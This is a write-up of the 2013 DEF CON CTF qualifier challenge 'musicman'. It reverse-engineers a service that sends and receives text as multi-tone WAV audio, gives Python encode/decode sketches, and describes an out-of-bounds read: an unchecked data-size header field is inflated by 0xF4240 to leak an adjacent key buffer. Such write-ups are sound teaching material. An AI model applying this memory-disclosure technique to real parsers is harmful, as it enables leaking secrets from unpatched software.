2013 DEF CON CTF qualifying - musicman writeup

This writeup explains how we (Andreas Straub, rep and myself as part of 0ldEr0pe) ended up pwning the musicman service during the 2013 DEF CON CTF qualifying (for which we didn’t qualify this year. Meh!).


The service listens on TCP port 7890. As soon as you connect, it starts throwing binary data at you. After dumping that data into a file, we recognized it as a WAV audio file. After fucking everybody up by playing the high-pitched noise contained in that file a few times for the lulz, we opened it up in Audacity and saw some obvious structure in the waveform.


That doesn’t look or sound like normal music.

The binary

So, let’s have a look at the binary.

This is the main function:

void __cdecl main()
{
  signed int v0; // [sp+2Ch] [bp-424h]@10
  signed int v1; // [sp+30h] [bp-420h]@7
  FILE *v2; // [sp+34h] [bp-41Ch]@1
  int v3; // [sp+38h] [bp-418h]@4
  int v4; // [sp+3Ch] [bp-414h]@11
  __pid_t v5; // [sp+40h] [bp-410h]@14
  int v6; // [sp+44h] [bp-40Ch]@4
  int v7; // [sp+42Ch] [bp-24h]@7
  int v8; // [sp+430h] [bp-20h]@7
  int v9; // [sp+434h] [bp-1Ch]@7
  int v10; // [sp+438h] [bp-18h]@7
  int v11; // [sp+43Ch] [bp-14h]@11
  int v12; // [sp+44Ch] [bp-4h]@1

  v12 = *MK_FP(__GS__, 20);                   // stack canary
  signal(17, (__sighandler_t)1);              // SIGCHLD -> SIG_IGN
  v2 = fopen("/home/musicman/key", "r");
  if ( !v2 )
    puts("Unable to open key file");
  fgets((char *)&v6, 999, v2);
  SendString(0, (const char *)&v6, key);      // encode the key as WAV into the global key buffer
  v3 = socket(2, 1, 0);                       // AF_INET, SOCK_STREAM
  if ( v3 < 0 )
    perror("ERROR opening socket");
  v1 = 1;
  setsockopt(v3, 1, 2, &v1, 4u);              // SOL_SOCKET, SO_REUSEADDR
  v7 = 0;
  v9 = 0;
  v10 = 0;
  LOWORD(v7) = 2;                             // sin_family = AF_INET
  v8 = 0;                                     // sin_addr = INADDR_ANY
  HIWORD(v7) = htons(0x1ED2u);                // sin_port = 7890
  if ( bind(v3, (const struct sockaddr *)&v7, 0x10u) < 0 )
    perror("ERROR on binding");
  listen(v3, 5);
  v0 = 16;
  while ( 1 )
  {
    v4 = accept(v3, (struct sockaddr *)&v11, (socklen_t *)&v0);
    if ( v4 < 0 )
      break;
    v5 = fork();
    if ( v5 < 0 )
      perror("ERROR on fork");
    if ( !v5 )
    {
      // child: drop privileges and call handle_client() (elided in this excerpt)
    }
  }
  perror("ERROR on accept");
}

The first important thing it does is open the key file and pass its contents to SendString(), which encodes them as a WAV file into the global key buffer. After that, the program does the usual socket-bind-listen-accept-fork-dropprivs dance until we land in handle_client(), where our connection is finally handled.

handle_client looks like this:

void __cdecl handle_client(int fd)
{
  int v1; // [sp+1Ch] [bp-7DCh]@2
  char s; // [sp+404h] [bp-3F4h]@2
  int v3; // [sp+7ECh] [bp-Ch]@1

  v3 = *MK_FP(__GS__, 20);
  puts("Sending string");
  SendString(fd, "Hello there...send me something\n", 0);
  while ( 1 )
  {
    RecvString(fd, &v1, 1000u);
    snprintf(&s, 0x3E8u, "You said: %s", &v1);
    SendString(fd, &s, 0);
  }
}

So the only thing it seems to do is send a greeting and then, in a loop, receive some data and echo it back to you, prefixed with "You said: ". But the communication doesn’t happen in plain ASCII: all data, in both directions, is encoded as WAV files.

Sending Text

This is the core of the SendString() function:

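for ( i = 0; i <= 7; ++i )
{
  GenerateWave(v10, 0xFFu);     // 8 leading marker symbols
  v10 += 4410;                  // 4410 bytes = 2205 16-bit samples per symbol
}
for ( j = 0; j < (signed int)(v3 - 1); ++j )
{
  GenerateWave(v10, a2[j]);     // one symbol per byte of the string
  v10 += 4410;
}
for ( k = 0; k <= 7; ++k )
{
  GenerateWave(v10, 0xFFu);     // 8 trailing marker symbols
  v10 += 4410;
}
if ( dest )
{
  result = memcpy(dest, wav, *(_DWORD *)&wav[4] + 8);
}
else
{
  v6 = send(fd, wav, *(_DWORD *)&wav[4] + 8, 0);
  result = (void *)(*(_DWORD *)&wav[4] + 8);
  if ( (void *)v6 != result )
  {
    // error handling not shown in this excerpt
  }
}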

This function takes an ASCII string and converts it into a WAV file.

After some setup, it calls GenerateWave() 8 times with 0xFF, then once for each byte of the passed string, and finally 8 more times with 0xFF. Each call produces one symbol, and the output pointer v10 advances by 4410 bytes per symbol, i.e. 2205 16-bit samples or 50 ms at 44.1 kHz. The finished WAV file is then either copied into a destination buffer or sent out to a file descriptor. The destination buffer is used for the key data; the file descriptor is usually the socket of the client connection.
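To make the layout concrete, here is a small Python sketch (not code from our exploit) of the symbol sequence SendString() produces and where each symbol starts. It assumes the whole string is sent; the exact bound v3 - 1 depends on setup code not shown above. frame_symbols and slot_start are names made up for this example.

```python
SAMPLE_RATE = 44100        # samples per second
SLOT_SAMPLES = 4410 // 2   # SendString() advances 4410 bytes of 16-bit samples per symbol
MARKER = 0xFF              # value of the preamble/trailer symbols
MARKER_COUNT = 8           # 8 markers before and after the payload


def frame_symbols(payload: bytes) -> list:
    """Byte values SendString() turns into symbols: 8 x 0xFF, the payload, 8 x 0xFF."""
    return [MARKER] * MARKER_COUNT + list(payload) + [MARKER] * MARKER_COUNT


def slot_start(index: int) -> int:
    """First sample of the index-th symbol slot (2205 samples = 50 ms each)."""
    return index * SLOT_SAMPLES
```

For example, slot_start(8) is 17640 (0x44E8), the sample at which the first real character starts. That is exactly the first value of v7 in RecvString() further down.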

Now, finally, to the part where the actual ASCII data is transformed into waveforms: the GenerateWave() function, called repeatedly by SendString():

int __cdecl GenerateWave(int a1, unsigned __int8 a2)
{
  double v3; // [sp+28h] [bp-20h]@2
  signed int i; // [sp+34h] [bp-14h]@1
  signed int j; // [sp+38h] [bp-10h]@2

  for ( i = 0; i <= 2104; ++i )
  {
    // carrier f[0] is always present (6.283185307179586 = 2*pi)
    v3 = sin((long double)f[0] * 6.283185307179586 * (long double)i / 44100.0);
    for ( j = 1; j <= 8; ++j )
    {
      // bit j-1 of the byte adds the tone f[j]
      if ( ((signed int)a2 >> (j - 1)) & 1 )
        v3 = sin((long double)f[j] * 6.283185307179586 * (long double)i / 44100.0) + v3;
    }
    *(_WORD *)(a1 + 2 * i) = (signed __int16)(double)(v3 * 3000.0);
  }
  return GenerateSilence(a1 + 4210);
}

The function looks complicated, but is actually pretty simple. Digital audio is a sequence of samples, each one the amplitude of the waveform at a single point in time; here, one second of audio consists of 44100 samples. GenerateWave() iterates over 2105 samples (about 48 ms), computes a sine wave with frequency f[0] for each of them, then loops over all 8 bits of the byte being encoded and adds another sine wave for every bit that is set. The sum is scaled by 3000 and stored as a 16-bit sample. The frequencies come from the array f:

.data:0804C0B8                 public f
.data:0804C0B8 ; __int16 f[]
.data:0804C0B8 f               dw 15000 ; DATA XREF: ReadChar+86r
.data:0804C0B8                          ; GenerateWave:loc_80499E8r ...
.data:0804C0BA                 dw 15250
.data:0804C0BC                 dw 15500
.data:0804C0BE                 dw 15750
.data:0804C0C0                 dw 16000
.data:0804C0C2                 dw 16250
.data:0804C0C4                 dw 16500
.data:0804C0C6                 dw 16750
.data:0804C0C8                 dw 17000

All these values are frequencies in Hz. The first sine wave, which is always present, has a frequency of 15 kHz; the lowest bit of the byte being processed maps to 15.25 kHz, and so on up to 17 kHz for the highest bit.
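A Python sketch that mirrors GenerateWave() for a single symbol, as far as the decompiled code shows it. The silence that pads each slot from 2105 to 2205 samples is an assumption about GenerateSilence(), whose code isn’t shown; symbol_frequencies and generate_symbol are our own names.

```python
import math

SAMPLE_RATE = 44100
TONE_SAMPLES = 2105   # GenerateWave() loops i = 0..2104
SLOT_SAMPLES = 2205   # SendString() advances 4410 bytes (2205 samples) per symbol
AMPLITUDE = 3000.0    # scale factor applied before the 16-bit conversion
# f[] from .data: f[0] is the always-present carrier, f[j] encodes bit j-1.
F = [15000, 15250, 15500, 15750, 16000, 16250, 16500, 16750, 17000]


def symbol_frequencies(byte: int) -> list:
    """Carrier plus one tone for every set bit of byte."""
    return [F[0]] + [F[j] for j in range(1, 9) if (byte >> (j - 1)) & 1]


def generate_symbol(byte: int) -> list:
    """Samples of one symbol slot: tones for 2105 samples, then silence (assumed)."""
    freqs = symbol_frequencies(byte)
    samples = []
    for i in range(TONE_SAMPLES):
        v = sum(math.sin(f * 2 * math.pi * i / SAMPLE_RATE) for f in freqs)
        # int() truncates toward zero like the C cast; 9 * 3000 still fits in 16 bits
        samples.append(int(v * AMPLITUDE))
    # Assumption: GenerateSilence() zero-fills the rest of the 2205-sample slot.
    samples.extend([0] * (SLOT_SAMPLES - TONE_SAMPLES))
    return samples
```

For an 'H' (0x48, bits 3 and 6 set) this yields the carrier plus 16 kHz and 16.75 kHz.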

So for each byte to be transmitted, a composite waveform of up to 9 sine waves of different frequencies is generated, followed by some silence. We obviously need to decode that stuff somehow, because the key is stored in this format, too. Let’s do it!


Decoding is actually pretty easy: we process the transmitted symbols one after another and extract the frequencies present during each symbol. We can do that by transforming the signal from the time domain into the frequency domain using a Fourier transform. The result is the spectrum of the signal, which tells us which sine-wave frequencies are mixed together in it. We did this in Python and plotted the spectrum a few times during development to check that we got everything right.
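A minimal sketch of the idea in Python (not the code from our exploit): instead of computing and plotting a full spectrum, it evaluates the Fourier sum directly at the nine frequencies from f, which is all a decoder needs. magnitude_at and spectrum are hypothetical helper names.

```python
import cmath
import math

SAMPLE_RATE = 44100
F = [15000, 15250, 15500, 15750, 16000, 16250, 16500, 16750, 17000]


def magnitude_at(samples, freq, rate=SAMPLE_RATE):
    """Magnitude of the Fourier sum of samples evaluated at one frequency (Hz)."""
    acc = 0j
    for n, x in enumerate(samples):
        acc += x * cmath.exp(-2j * math.pi * freq * n / rate)
    return abs(acc)


def spectrum(samples):
    """Magnitudes at the carrier and the eight bit frequencies, in f[] order."""
    return [magnitude_at(samples, f) for f in F]
```

Fed with the 2105 tone samples of one symbol, this gives much larger values at the frequencies that are present than at the others: the tones are 250 Hz apart, while a 2105-sample window resolves roughly 21 Hz.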

This is the spectrum of one of the 0xFF bytes at the beginning:
[Figure: spectrum of a 0xFF symbol]

And this is what an 'H' character looks like:
[Figure: spectrum of an 'H' symbol]

You can clearly see which frequencies are present and which are absent.

The last step is to set every bit whose frequency shows a peak in the spectrum and convert the resulting byte to ASCII.
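That bit decision can be sketched like this, assuming we already have the nine magnitudes of each symbol (carrier first, then bits 0 to 7). The default threshold of 1000000.0 is the one ReadChar() uses further down; whether it fits a particular magnitude scale is an assumption, so it is a parameter. The function names are hypothetical.

```python
THRESHOLD = 1000000.0   # same constant as in ReadChar(); scale-dependent


def byte_from_magnitudes(mags, threshold=THRESHOLD):
    """mags[0] is the carrier, mags[1..8] are bits 0..7; set each bit whose tone peaks."""
    value = 0
    for j in range(1, 9):
        if mags[j] > threshold:
            value |= 1 << (j - 1)
    return value


def decode_message(symbol_mags, threshold=THRESHOLD):
    """Turn per-symbol magnitudes into text, dropping the 0xFF preamble/trailer."""
    data = bytes(byte_from_magnitudes(m, threshold) for m in symbol_mags)
    return data.strip(b"\xff").decode("ascii", errors="replace")
```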

Getting the key

Before we actually got the key, we also implemented encoding ASCII characters into waveforms. That turned out to be unnecessary, but it wasn’t much work since we already knew how the algorithm worked. You can find all the routines in the exploit.

Now, how do we get the key? The buffer holding the key WAV file is only used in main(). Stack canaries are everywhere and all strings are properly bounds-checked, so there is no obvious memory corruption bug to exploit. Then Mark, after looking at the code for about five minutes, found the one bit we needed in the receive path. RecvString() reads a whole WAV file from the socket into the global wav buffer. It then verifies a few values in the WAV header to make sure the format is correct, and successively calls ReadChar() with the first and last sample number of each symbol to be decoded (ReadChar() reads the samples from the global wav buffer itself):

if ( *(_DWORD *)wav == 1179011410           // "RIFF"
  && *(_DWORD *)&wav[8] == 1163280727       // "WAVE"
  && *(_DWORD *)&wav[12] == 544501094       // "fmt "
  && *(_DWORD *)&wav[36] == 1635017060      // "data"
  && *(_DWORD *)&wav[16] == 16              // fmt chunk size
  && *(_WORD *)&wav[20] == 1                // PCM
  && *(_WORD *)&wav[22] == 1                // mono
  && *(_WORD *)&wav[34] == 16               // 16 bits per sample
  && *(_DWORD *)&wav[24] == 44100 )         // sample rate
{
  v7 = 0x44E8u;                             // first sample after the 8 marker symbols
  v8 = 0x4D85u;
  v6 = 0;
  do
  {
    if ( 2 * v8 >= (unsigned int)(*(_DWORD *)&wav[4] - 35272) )
      break;
    *((_BYTE *)a2 + v6++) = ReadChar(v7, v8);
    v7 = v8 + 1;
    v8 += 2206;
  }
  while ( (signed int)(n - 1) >= v6 );
}
else
{
  SendString(fd, "Only know how to process 16-bit mono pcm sampled at 44100Hz\n", 0);
}
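For the exploit we need to send a WAV file that survives these checks. Here is a Python sketch (hypothetical helper names, canonical 44-byte header assumed) that builds such a file and mirrors the comparisons above. The magic numbers are simply the little-endian encodings of "RIFF", "WAVE", "fmt " and "data".

```python
import struct


def build_wav(samples, rate=44100):
    """Canonical 44-byte header followed by 16-bit mono PCM samples."""
    data = struct.pack("<%dh" % len(samples), *samples)
    header = struct.pack(
        "<4sI4s4sIHHIIHH4sI",
        b"RIFF", 36 + len(data), b"WAVE",          # offset 4: file size - 8
        b"fmt ", 16, 1, 1, rate, rate * 2, 2, 16,  # PCM, mono, 16-bit
        b"data", len(data),                        # offset 40: data size
    )
    return header + data


def passes_recvstring_checks(wav):
    """Python mirror of the header comparisons in RecvString()."""
    if len(wav) < 44:
        return False
    riff, _size, wave, fmt, fmt_len, audio_fmt, channels, rate = struct.unpack_from("<4sI4s4sIHHI", wav, 0)
    (bits,) = struct.unpack_from("<H", wav, 34)
    (data_id,) = struct.unpack_from("<4s", wav, 36)
    return (riff == b"RIFF" and wave == b"WAVE" and fmt == b"fmt " and data_id == b"data"
            and fmt_len == 16 and audio_fmt == 1 and channels == 1
            and bits == 16 and rate == 44100)
```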

Now, ReadChar() does some pretty complicated stuff at first sight:

int __cdecl ReadChar(int a1, int a2)
{
  long double v2; // fst7@1
  long double v3; // fst7@1
  double v4; // ST08_8@13
  double v5; // ST00_8@13
  int v7[9]; // [sp+24h] [bp-64h]@2
  double v8; // [sp+48h] [bp-40h]@1
  double v9; // [sp+50h] [bp-38h]@1
  double v10; // [sp+58h] [bp-30h]@13
  int i; // [sp+60h] [bp-28h]@1
  int wavBufferStart; // [sp+64h] [bp-24h]@1
  int v13; // [sp+68h] [bp-20h]@1
  int v14; // [sp+6Ch] [bp-1Ch]@1
  void *ptr; // [sp+70h] [bp-18h]@4
  int sampleDataOffset; // [sp+74h] [bp-14h]@6
  char *v17; // [sp+78h] [bp-10h]@7
  unsigned __int8 v18; // [sp+7Fh] [bp-9h]@12

  wavBufferStart = (int)wav;
  v8 = -9999.0;
  v13 = a2 - a1;                              // window length in samples
  v2 = log((long double)(a2 - a1));
  v3 = ceil(v2 / 0.6931471805599453);         // ceil(log2(window length))
  v14 = (signed int)pow(2.0, v3);             // FFT size: next power of two
  v9 = 44100.0 / (long double)v14;            // width of one FFT bin in Hz
  for ( i = 0; i <= 8; ++i )
    v7[i] = (signed int)((long double)f[i] / v9);   // FFT bin of each tone
  ptr = malloc(16 * v14 + 8);
  if ( !ptr )
  {
    // allocation failure handling not shown in this excerpt
  }
  sampleDataOffset = *(_DWORD *)(wavBufferStart + 4) - *(_DWORD *)(wavBufferStart + 40) + 8;
  for ( i = 0; i < v13; ++i )
  {
    v17 = &wav[2 * (i + a1)] + sampleDataOffset;
    *((double *)ptr + 2 * i + 1) = (long double)*(signed __int16 *)(&wav[2 * (i + a1)] + sampleDataOffset);
    *((double *)ptr + 2 * (i + 1)) = 0.0;
  }
  for ( i = v13; i < v14; ++i )               // zero-pad up to the FFT size
  {
    *((double *)ptr + 2 * i + 1) = 0.0;
    *((double *)ptr + 2 * (i + 1)) = 0.0;
  }
  four1((int)ptr, v14, 1);
  v18 = 0;
  for ( i = 1; i <= 8; ++i )
  {
    v4 = *((double *)ptr + 2 * (v7[i] + 1));
    v5 = *((double *)ptr + 2 * v7[i] + 1);
    v10 = GetFrequencyIntensity(LODWORD(v5), HIDWORD(v5), LODWORD(v4), HIDWORD(v4));
    if ( v10 > 1000000.0 )
      v18 |= 1 << (i - 1);
  }
  return v18;
}
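The setup arithmetic of ReadChar() is easy to reproduce even without understanding the rest. This Python sketch (readchar_params is a made-up name) computes the FFT size, the bin width and the bin of every tone for the 2205-sample windows RecvString() passes in. As an educated guess, the 2 * i + 1 / 2 * (i + 1) indexing looks like the interleaved, 1-based real/imaginary layout used by the classic Numerical Recipes four1() routine.

```python
import math

SAMPLE_RATE = 44100
F = [15000, 15250, 15500, 15750, 16000, 16250, 16500, 16750, 17000]


def readchar_params(window_len):
    """FFT size, bin width (Hz) and per-tone bin index, computed like ReadChar()."""
    # ceil(log(n) / ln 2) -> exponent of the next power of two, as in the C code
    n_fft = int(2 ** math.ceil(math.log(window_len) / math.log(2)))
    bin_width = SAMPLE_RATE / n_fft
    # (signed int)(f[i] / v9): truncate to an integer bin index
    bins = [int(f / bin_width) for f in F]
    return n_fft, bin_width, bins
```

For a 2205-sample window this gives a 4096-point FFT with bins of about 10.77 Hz, so neighbouring tones are roughly 23 bins apart.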

I won’t go into all the details here, because I don’t know them and we don’t need to understand that function completely to exploit the service. But notice the line that computes sampleDataOffset: the function needs to find the samples in the WAV file to do the frequency analysis that converts the waveforms back into binary data, and this is where it does that.

It takes the value at offset 4 of the WAV header, subtracts the value at offset 40, and adds 8. What?

Let’s have a look at the WAV-header in detail:

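Offset     Length  Explanation
0 (0x00)   4       ‘RIFF’
4 (0x04)   4       file size − 8
8 (0x08)   4       ‘WAVE’
12 (0x0C)  4       ‘fmt ’
16 (0x10)  4       fmt chunk size (16 for PCM)
20 (0x14)  2       audio format (1 = PCM)
22 (0x16)  2       number of channels (1 = mono)
24 (0x18)  4       sample rate (44100)
28 (0x1C)  4       byte rate (sample rate × block align)
32 (0x20)  2       block align (channels × bytes per sample)
34 (0x22)  2       bits per sample (16)
36 (0x24)  4       ‘data’
40 (0x28)  4       data size (number of bytes of sample data)
44 (0x2C)  n       sample data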

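The value at offset 4 is the total file size minus 8, and the value at offset 40 is the size of the sample data in bytes. So the sampleDataOffset formula computes (file size − 8) − data size + 8 = file size − data size, which for a well-formed file is 44, the offset at which the samples start. Added to the address of the wav buffer, that gives the start of the sample data in memory, and the loop right after it fetches each sample from there and feeds it into the FFT.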
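The same arithmetic in a few lines of Python (sample_data_offset is a hypothetical name). In ReadChar() the result is stored in an int, so once the value at offset 40 grows large enough the offset becomes negative and the sample pointer moves backwards from the wav buffer.

```python
import struct


def sample_data_offset(wav_header):
    """ReadChar()'s formula: (value at offset 4) - (value at offset 40) + 8."""
    riff_size = struct.unpack_from("<I", wav_header, 4)[0]   # file size - 8
    data_size = struct.unpack_from("<I", wav_header, 40)[0]  # bytes of sample data
    return riff_size - data_size + 8
```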

Both the file size and the data size are fully under our control. The file size is used by the receive loop to read data from the socket, so we can’t tamper with that one. But the value at offset 40 is never checked for validity, so we can use it to make the computed sample offset point outside of the wav buffer.

Looking at the memory layout of the key and wav buffers, we see that the key buffer sits directly in front of the wav buffer. So if we make the value at offset 40 large enough, sampleDataOffset becomes negative and ReadChar() fetches its samples from the key buffer instead of the wav buffer. Fuck yeah!

How large does this value need to be? Each buffer is 0xF4240 (1,000,000) bytes, so we just add exactly that to the value at offset 40 of the WAV file we send to musicman. The computed sample offset then moves back by one buffer size and lands on the samples in the key buffer, which holds a complete WAV file with the same header layout. Instead of the data we sent, the data in the key buffer is decoded to ASCII, prefixed with “You said: ” and sent back to us in another WAV file. We decode that and boom, we got the key!
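The whole exploit boils down to patching one field. A Python sketch (patch_data_size is a hypothetical name, not from our exploit) that takes any WAV file passing RecvString()’s checks, for example one full of silence, and adds 0xF4240 to the value at offset 40 while leaving the file size at offset 4 alone. We assume the file has at least as many symbol slots as the key, since RecvString() derives the number of symbols to decode from the size of the file we send.

```python
import struct

BUFFER_SIZE = 0xF4240   # size of each global buffer (key, wav)


def patch_data_size(wav, delta=BUFFER_SIZE):
    """Copy of wav with the data size at offset 40 increased by delta.

    The RIFF size at offset 4 (used by the receive loop) stays untouched, so the
    service still reads the whole file; only ReadChar()'s computed sample offset
    moves back by delta bytes, from the wav buffer into the key buffer in front of it.
    """
    data_size = struct.unpack_from("<I", wav, 40)[0]
    patched = bytearray(wav)
    struct.pack_into("<I", patched, 40, (data_size + delta) & 0xFFFFFFFF)
    return bytes(patched)
```

The reply is then decoded like any other message from the service.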

The exploit

The exploit itself is available here. I added the daemon itself, too. I hope this is ok.

Keep in mind that this code is not the prettiest; we wrote that stuff under pressure ;)

All in all, it was a really awesome challenge, especially if you have just started digging deeper into digital signal processing because you started playing with a software-defined radio.